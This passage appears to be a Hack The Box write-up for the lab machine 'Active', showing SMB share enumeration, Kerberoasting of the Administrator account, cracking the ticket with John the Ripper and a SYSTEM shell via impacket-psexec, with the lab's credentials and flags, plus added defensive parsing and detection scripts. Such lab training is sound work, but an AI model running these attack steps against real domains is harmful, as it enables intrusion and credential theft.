SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\SVC_TGS:GPPstillStandingStrong2k18 
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    DC               Users           READ   

We can read the "Users" share, where the user flag is most likely located.

2.2 Obtaining the user flag

Let's list the directories of the "Users" share with smbmap and the credentials we obtained from the XML file.

To do that, we use the following command:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users

We run it:

[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
	./Users
	dw--w--w--                0 Sat Jul 21 11:39:20 2018	.
	dw--w--w--                0 Sat Jul 21 11:39:20 2018	..
	dr--r--r--                0 Mon Jul 16 07:14:21 2018	Administrator
	dr--r--r--                0 Mon Jul 16 18:08:56 2018	All Users
	dw--w--w--                0 Mon Jul 16 18:08:47 2018	Default
	dr--r--r--                0 Mon Jul 16 18:08:56 2018	Default User
	fr--r--r--              174 Mon Jul 16 18:01:17 2018	desktop.ini
	dw--w--w--                0 Mon Jul 16 18:08:47 2018	Public
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	SVC_TGS
[*] Closed 1 connections

We find the "SVC_TGS" user's directory; let's list it:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users/SVC_TGS
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
	./UsersSVC_TGS
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	.
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	..
	dr--r--r--                0 Sat Jul 21 12:14:20 2018	Contacts
	dr--r--r--                0 Sat Jul 21 12:14:42 2018	Desktop
	dr--r--r--                0 Sat Jul 21 12:14:28 2018	Downloads
	dr--r--r--                0 Sat Jul 21 12:14:50 2018	Favorites
	dr--r--r--                0 Sat Jul 21 12:15:00 2018	Links
	dr--r--r--                0 Sat Jul 21 12:15:23 2018	My Documents
	dr--r--r--                0 Sat Jul 21 12:15:40 2018	My Music
	dr--r--r--                0 Sat Jul 21 12:15:50 2018	My Pictures
	dr--r--r--                0 Sat Jul 21 12:16:05 2018	My Videos
	dr--r--r--                0 Sat Jul 21 12:16:20 2018	Saved Games
	dr--r--r--                0 Sat Jul 21 12:16:32 2018	Searches
[*] Closed 1 connections 

Now let's go to the Desktop:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -r Users/SVC_TGS/Desktop
[+] IP: 10.10.10.100:445	Name: active.htb          	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	NO ACCESS	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
	Users                                             	READ ONLY	
	./UsersSVC_TGS/Desktop
	dr--r--r--                0 Sat Jul 21 12:14:42 2018	.
	dr--r--r--                0 Sat Jul 21 12:14:42 2018	..
	fw--w--w--               34 Sat Feb 22 08:35:33 2025	user.txt
[*] Closed 1 connections

There is the flag; let's download it with the following command:

smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --download Users/SVC_TGS/Desktop/user.txt

We run it:

❯ smbmap -H 10.10.10.100 -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' --download Users/SVC_TGS/Desktop/user.txt

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB                                                                                                  
[*] Established 1 SMB connections(s) and 1 authenticated session(s)                                                      
[+] Starting download: Users\SVC_TGS\Desktop\user.txt (34 bytes)                                                         
[+] File output to: /home/t0mz/CTF/active/10.10.10.100-Users_SVC_TGS_Desktop_user.txt                                    
[*] Closed 1 connections 

(Remember to rename the files we download with smbmap.)

Now let's view the contents of user.txt, which holds the flag to submit on Hack The Box:

❯ mv 10.10.10.100-Users_SVC_TGS_Desktop_user.txt user.txt
❯ ls
crackmapexec.txt  escaneo.txt  Groups.xml  password  ping.txt  smbmap.txt  user.txt
❯ cat user.txt
───────┬──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
       β”‚ File: user.txt
───────┼──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
   1   β”‚ 39ab1677a3ff895c301433570a1d57f7
───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

3- Privilege escalation

3.1 Kerberoasting

We are going to perform Kerberoasting with the SVC_TGS user we obtained. In short, with this user we ask the domain controller for a service ticket (TGS) for an account that has an SPN registered; part of that ticket is encrypted with a key derived from the service account's password, so we get it back in a form that can be cracked offline as a hash. We can then run John the Ripper or Hashcat against it; in my case I will use John the Ripper.

To obtain the ticket as a hash, we first need our Kali clock synchronised with the target machine's clock: Kerberos rejects requests whose timestamp is too far from the DC's time (clock skew), which breaks the ticket request. For this we use the "ntpdate" tool with the following command:

(If "ntpdate" is not installed, install it with the apt package manager: "sudo apt install ntpdate")

sudo ntpdate 10.10.10.100

We run it:

❯ sudo ntpdate 10.10.10.100
2025-02-23 23:30:31.528622 (-0300) +2.089291 +/- 0.100257 10.10.10.100 s1 no-leap
CLOCK: time stepped by 2.089291

Now let's check whether we have permission to request the ticket as a hash, using the "impacket-GetUserSPNs" tool with the following command:

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18

The command is structured as follows:

impacket-GetUserSPNs {Domain or IP}/{Username}:{User's password}

We run it:

❯ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 16:06:40.351723  2025-02-22 08:35:36.933359

We see that we can, and moreover that we will obtain the Administrator's password in hash form (the Administrator account has the SPN active/CIFS:445 registered). So now let's request it with the "-request" parameter:

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request

We run it:

❯ impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 16:06:40.351723  2025-02-22 08:35:36.933359

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$68fc33ed307322ba1e71555d9541e8fe$aa2ea019b718a625f8e1dfd06c80772f43148fff909eddc2e5514558d0a27afd2acf90b71a365bcc741c07a4c830770f89a978cda12be069bbb2e7b0a542f0955e418dc7845dd501f95f652d33febeaaf574e4bb9e3195cd9fe4919786348f9f49190fc9386de30ed66a7d238ba42a0148c00cfff5eee7292e4f1278ac621fa6f0311faba87eb9b797744f099b36fe35e72ff74b1a110771a1c57f4e24c0d280fae1899d1dff8e9e0d0d5c158755a188d5d2dde87d8563f77b2af7015f6baae40ef60f46b9af14f1ee8e2b8817c84b82820b9f71d9e569d8726069ff9630674f205b2dd3514984118b45e5fc1de2a5be5fb18eca46f46ac3fbbaa4621420b5d96ed958e4b2387ecffcdd0cc80511a11735d9c260b829eb95e8e06e37ef43a3af27b8fadb3804136f2e6d17b1652518a3d39464e69faf5d4b8eec531c837098be53676345a91e05b68f9918212d9b14b558dad4b753ddc15470939815d2b615b5869236681b63383d32fab279b74c4c92432e7b588f0fc3a385899137759f1f039260c2016d13558cd12d6ea5b42c85cc5320207cda7de6e54f5216bedc850268cc88afef2e911aab405b3ea9016581f5947534fbd79b26d2f5c7bc30a1dc44877c4ab3eafc770498f54f1466165024afa3e73f38e0de2c2ae5a180798c2c5c3a0afba8dfe57e52b73cc023f38e2533dd5aa5263a3f8776d6c99ac073d0d27336768145f63343ef999bde08a6d9d0a3c58a0d755b1c717fee3a637b49277f0fd23b5deba5ea64faab8213df178de2e73e63d4a117e1ef27907ec37432f73bfdc94012560c26aee216d0f48a48e63410ae292defdc43e63e55b157ad5aacc250faa9c38934db4937ba5c52adfd8eb2447faaf7157a79ee68701818078d19a2a2c28597c8df97ebf7f23797d07c3b056a6837d0cbcb4d844f7b894f1b2249c6d76082c82033107568d52dde1b7c7e6b4b1859a89ce5443d5c6bff07f1ade13a519579e8bd873441bcaa5161107a53792e0a9e4197c5480970cec70fd76202d7401b825ea5848bf7583ca306457d173f1f041cfe85977f8520a45d7e6136d0492b779b334e3d452ab363d3f7ce3bd61d4ebc6d6ecf9865ecd5f7ec28dc8a4e4a190a8f62ba036102c63f711bcaa81f2e9f77cee17b6fb1bef8386279037d79266360cdc339c1e0aa7d2d0ab53304ed7385b84d2534e9d3a9e565d26ccc066be68756a236819a22a645c05a5b1be5ce0097431d5270b656cfa6c28adc

We see that it returned the Administrator's password in hash form (the encrypted part of the service ticket); let's save it to a file:

❯ vim password_hash_ticket

Before brute-forcing, we will use a specific wordlist, the classic of classics: rockyou. Download it from the following link:

rockyou.txt link

And now we apply brute force with John the Ripper to this hashed ticket with the following command:

john --wordlist=rockyou.txt {TICKET HASH FILE}

In my case the command looks like this:

john --wordlist=rockyou.txt password_hash_ticket

We run it:

❯ john --wordlist=wordlist/rockyou.txt password_hash_ticket
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 4.79% (ETA: 23:49:29) 0g/s 789504p/s 789504c/s 789504C/s skyline93..skator
Ticketmaster1968 (?)     
1g 0:00:00:13 DONE (2025-02-23 23:49) 0.07429g/s 782873p/s 782873c/s 782873C/s Tiffani143..TiagoTorrao
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We see that it produced a password, so the password of the Administrator user is "Ticketmaster1968":

User: Administrator
Password: Ticketmaster1968
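As an added example (not part of the original write-up): the `$krb5tgs$23$` line that GetUserSPNs printed above is the ticket in the layout John and Hashcat consume, and the parser below splits it into its fields so you can see what is actually being cracked. The sample line is constructed: its header and checksum are the ones shown above for active.htb/Administrator, but the ciphertext is truncated to 16 bytes; the comments explain why an etype-23 ticket is so cheap to guess against and what a defender changes.

```python
import re

# Field layout of the etype-23 (RC4-HMAC) line that GetUserSPNs -request prints:
#   $krb5tgs$23$*<account>$<REALM>$<spn>*$<checksum: 16-byte HMAC-MD5>$<edata: RC4 ciphertext>
KRB5TGS_RC4 = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<account>[^$*]+)\$(?P<realm>[^$*]+)\$(?P<spn>[^$*]+)\*"
    r"\$(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Constructed sample: header and checksum as printed above, ciphertext truncated.
SAMPLE = ("$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*"
          "$68fc33ed307322ba1e71555d9541e8fe$aa2ea019b718a625f8e1dfd06c80772f")


def parse_krb5tgs(line: str) -> dict:
    """Split a $krb5tgs$23$ line into its fields; raise ValueError on anything else."""
    m = KRB5TGS_RC4.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$23$ line in the expected layout")
    etype = int(m["etype"])
    if etype != 23:
        # AES tickets (etype 17/18) are printed in a different layout; only RC4 is handled here.
        raise ValueError(f"etype {etype} not supported by this parser")
    if len(m["edata"]) % 2:
        raise ValueError("ciphertext is not a whole number of bytes")
    # Why etype 23 cracks fast: the ticket key is the service account's NT hash
    # (MD4 of the UTF-16LE password), unsalted and unstretched, so each guess costs
    # one MD4 plus one HMAC-MD5. John's "[MD4 HMAC-MD5 RC4]" label above says the same.
    # The fix is on the account: a long random password or a gMSA, and removing RC4
    # from the account's supported encryption types so the DC issues AES tickets.
    return {
        "etype": etype,
        "account": m["account"],
        "realm": m["realm"],
        "spn": m["spn"],
        "checksum": m["checksum"].lower(),
        "edata_len": len(m["edata"]) // 2,
    }


if __name__ == "__main__":
    fields = parse_krb5tgs(SAMPLE)
    print(f"{fields['spn']} -> account {fields['account']}@{fields['realm']}, "
          f"etype {fields['etype']}, {fields['edata_len']} ciphertext bytes")
```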

Let's verify that the credentials are valid with crackmapexec:

crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'

We run it:

❯ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968'
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)

Now let's list the permissions we have on the shared resources:

crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' --shares

We run it:

❯ crackmapexec smb 10.10.10.100 -u 'Administrator' -p 'Ticketmaster1968' --shares
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)
SMB         10.10.10.100    445    DC               [+] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$          READ,WRITE      Remote Admin
SMB         10.10.10.100    445    DC               C$              READ,WRITE      Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON        READ,WRITE      Logon server share 
SMB         10.10.10.100    445    DC               Replication     READ            
SMB         10.10.10.100    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.100    445    DC               Users           READ 

3.2 Reverse shell with the Administrator credentials

Once we have the Administrator user's credentials, let's get a shell with NT AUTHORITY\SYSTEM privileges. For that we use the "impacket-psexec" tool, passing it the credentials, the target and the command to run.

The command to use is the following:

impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exe

We run it:

❯ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100 cmd.exe
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file bvkxOfwz.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service VzVS on 10.10.10.100.....
[*] Starting service VzVS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 
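As an added defender-side example (not part of the original write-up): the psexec output above shows exactly what this technique leaves behind on the target, a randomly named executable uploaded to ADMIN$ (the C:\Windows directory) and a short randomly named service created to run it. The script below applies that heuristic to a constructed sample of "service installed" records (Windows System log event ID 7045, reduced to the fields needed); the sample records, field names, the %SystemRoot% image path and the 4-letter/8-letter name pattern are assumptions drawn from the output above, not real target logs.

```python
import re

# Constructed sample of "service was installed" records (System log, event ID 7045),
# reduced to the fields the heuristic needs. The first record mirrors the names
# seen in the psexec output above; the others are benign noise.
SAMPLE_EVENTS = [
    {"time": "2025-02-23T23:55:01", "event_id": 7045, "service": "VzVS",
     "image": r"%SystemRoot%\bvkxOfwz.exe", "account": "LocalSystem"},
    {"time": "2025-02-23T23:55:40", "event_id": 7045, "service": "Spooler",
     "image": r"%SystemRoot%\System32\spoolsv.exe", "account": "LocalSystem"},
    {"time": "2025-02-23T23:56:12", "event_id": 7036, "service": "VzVS",
     "image": "", "account": ""},
]

# Pattern observed above: 4-letter service name, 8-letter executable name,
# binary dropped in the root of ADMIN$, i.e. %SystemRoot% / C:\Windows (assumed).
SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
IMAGE_PATH = re.compile(
    r"^(?:%SystemRoot%|[A-Za-z]:\\Windows)\\[A-Za-z]{8}\.exe$", re.IGNORECASE)


def is_psexec_like(event: dict) -> bool:
    """True when a 7045 record matches the random-name service + binary pattern."""
    if event.get("event_id") != 7045:
        return False
    return bool(SERVICE_NAME.match(event.get("service", ""))
                and IMAGE_PATH.match(event.get("image", "")))


def find_psexec_services(events: list) -> list:
    """Return (time, service, image) for every record that trips the heuristic."""
    return [(e["time"], e["service"], e["image"])
            for e in events if is_psexec_like(e)]


if __name__ == "__main__":
    for hit in find_psexec_services(SAMPLE_EVENTS):
        print("possible psexec-style service install:", hit)
```

A real deployment would read these records from the System log (or a SIEM) instead of the inline sample; the name-length heuristic catches the default naming shown above but not an operator who renames the binary and service.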

3.3 Obtaining the root flag

The root flag is at "C:\Users\Administrator\Desktop\root.txt"; let's view it with the "type" command:

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> type "C:\Users\Administrator\Desktop\root.txt"
bf19773bbc7b09bb12880d27b0aafaa3

C:\Windows\system32> 

With this, we have completed the "Active" machine from Hack The Box.

I hope this write-up was helpful to you :)

If you ran into any difficulty while solving it, don't forget to contact me on my social networks.
